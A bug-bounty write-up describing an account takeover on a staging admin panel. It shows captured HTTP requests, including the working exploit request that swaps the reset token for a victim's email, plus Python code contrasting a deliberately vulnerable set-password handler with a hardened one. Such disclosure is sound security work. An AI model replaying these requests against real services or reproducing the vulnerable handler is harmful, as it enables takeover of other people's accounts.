Account takeover for $3000


sushantdhopat

I was hunting on a private program on HackerOne. The scope of this program was only one domain, a kind of internal admin panel hosted on staging for testing.

I just randomly checked every functionality and came to the password reset functionality. I tried my methodology for testing password reset for ATO: changing the Host header or adding extra Host, X-Forwarded-Host and X-Forwarded-For headers and checking whether they are reflected in the password reset link, adding an extra email param, making an array of emails (the request is in JSON format), etc., but nothing worked.

Then I came to the password reset link. I just opened the link, entered new credentials and captured the request:

PUT /auth/api/v1/set-password HTTP/2
Host: target.com
Cookie: cookietest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://target/auth/password-reset?email=sushant_dhopat%40wearehackerone.com&new_user=false&reset_password_token=c9b34c009ccd5d1e05f0a6c7f55811ab94e6cb45ee287f26018cfb6848c9cf52&source_url=http%3A%2F%2Fbing.com
Content-Type: application/json
Origin: https://target.com
Content-Length: 150
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"password":"Ssd@9619979602","reset_password_token":"c9b34c009ccd5d1e05f0a6c7f55811ab94e6cb45ee287f26018cfb6848c9cf52","source_url":"https://target.com"}

Now I started playing with this request. I noticed that when the admin user invites different users to the team and the user opens the account setup link / email verification link, that URL is the same as the password reset URL; and when the admin user sets a password for a particular user, that URL is also the same as the password reset URL.

It just came to my mind: in the password reset request I removed the reset_password_token param and added an email param with the victim's email address.

Now the request looks like this:

PUT /auth/api/v1/set-password HTTP/2
Host: target.com
Cookie: cookietest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://target/auth/password-reset?email=sushant_dhopat%40wearehackerone.com&new_user=false&reset_password_token=c9b34c009ccd5d1e05f0a6c7f55811ab94e6cb45ee287f26018cfb6848c9cf52&source_url=http%3A%2F%2Fbing.com
Content-Type: application/json
Origin: https://target.com
Content-Length: 150
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"password":"Css@9619979602","email":"victim@gmail.com","source_url":"https://target.com"}

I sent the request and, unfortunately, the backend doesn't check or verify the password reset token: I had just set a new password for victim@gmail.com. Like this I can set a new password for any user without any interaction, which leads to a full account takeover with just an email address.
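The root cause described above is that the backend let a client-supplied email decide whose password gets changed, so the reset token stopped being required. The following is an added illustration (not the target's code and not the author's) of a set-password handler written both ways: a vulnerable version that mirrors the behaviour in the write-up, and a hardened version in which the account identity is taken only from a valid, unexpired, single-use token and any email in the body is cross-checked against it. The in-memory stores, the 30-minute token lifetime, the 12-character minimum and the sample accounts are all assumptions made for the example.

```python
"""Set-password handler: the flaw in the write-up beside a hardened version.

Constructed illustration only. Users and reset tokens live in in-memory dicts
standing in for the backend behind /auth/api/v1/set-password.
"""
import hashlib
import hmac
import secrets
import time

TOKEN_TTL_SECONDS = 30 * 60   # assumption: a 30-minute reset window
MIN_PASSWORD_LEN = 12         # assumption: minimum length enforced server-side


def _hash_password(password: str, salt: bytes) -> bytes:
    # PBKDF2 keeps the sample dependency-free; a real service would tune the cost.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def _token_key(token: str) -> str:
    # Only a hash of the raw token is stored, so a leaked store cannot be replayed.
    return hashlib.sha256(token.encode()).hexdigest()


class PasswordResetService:
    def __init__(self):
        self.users = {}          # email -> {"salt": bytes, "hash": bytes}
        self.reset_tokens = {}   # sha256(token) -> {"email": str, "expires": float}

    def add_user(self, email: str, password: str) -> None:
        salt = secrets.token_bytes(16)
        self.users[email] = {"salt": salt, "hash": _hash_password(password, salt)}

    def check_password(self, email: str, password: str) -> bool:
        rec = self.users.get(email)
        if rec is None:
            return False
        return hmac.compare_digest(rec["hash"], _hash_password(password, rec["salt"]))

    def issue_reset_token(self, email: str) -> str:
        """Called by the forgot-password flow; the raw token goes only into the emailed link."""
        token = secrets.token_hex(32)
        self.reset_tokens[_token_key(token)] = {
            "email": email, "expires": time.time() + TOKEN_TTL_SECONDS}
        return token

    def _store_password(self, email: str, password: str) -> None:
        rec = self.users[email]
        rec["hash"] = _hash_password(password, rec["salt"])

    # --- vulnerable: the behaviour the write-up describes ---------------------
    def set_password_vulnerable(self, body: dict) -> tuple:
        """If the body carries 'email', the token is never consulted at all."""
        email = body.get("email")
        if email is None:
            rec = self.reset_tokens.get(_token_key(body.get("reset_password_token", "")))
            if rec is None:
                return 400, "invalid token"
            email = rec["email"]
        if email not in self.users:
            return 404, "no such user"
        self._store_password(email, body["password"])   # identity came from the client
        return 200, "ok"

    # --- hardened -------------------------------------------------------------
    def set_password_hardened(self, body: dict) -> tuple:
        """The token is the only proof of identity; it must be present, valid and unused."""
        token = body.get("reset_password_token")
        if not isinstance(token, str) or not token:
            return 400, "reset_password_token required"
        # pop() first so the token is consumed even if a later check fails (single use)
        rec = self.reset_tokens.pop(_token_key(token), None)
        if rec is None or rec["expires"] < time.time():
            return 400, "invalid or expired token"
        # A client-supplied email that disagrees with the token is a tampering signal
        # worth alerting on; it never overrides the token's binding.
        if "email" in body and body["email"] != rec["email"]:
            return 400, "email does not match token"
        password = body.get("password")
        if not isinstance(password, str) or len(password) < MIN_PASSWORD_LEN:
            return 400, "password too short"
        self._store_password(rec["email"], password)
        return 200, "ok"


if __name__ == "__main__":
    svc = PasswordResetService()
    svc.add_user("victim@gmail.com", "OldPassword123!")          # constructed account
    tampered = {"password": "Css@9619979602", "email": "victim@gmail.com"}
    print("vulnerable:", svc.set_password_vulnerable(tampered))   # 200: token never checked
    print("hardened:  ", svc.set_password_hardened(tampered))     # 400: token required
```

The hardened handler also records a `400` with a distinct reason for an email/token mismatch; on a real service that reason string is the thing to feed into logging, since a reset request carrying someone else's address alongside a valid token is exactly the pattern this write-up is about.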

Conclusion:

Just play with the password reset request: replace params, add params, etc., and see how the request behaves.
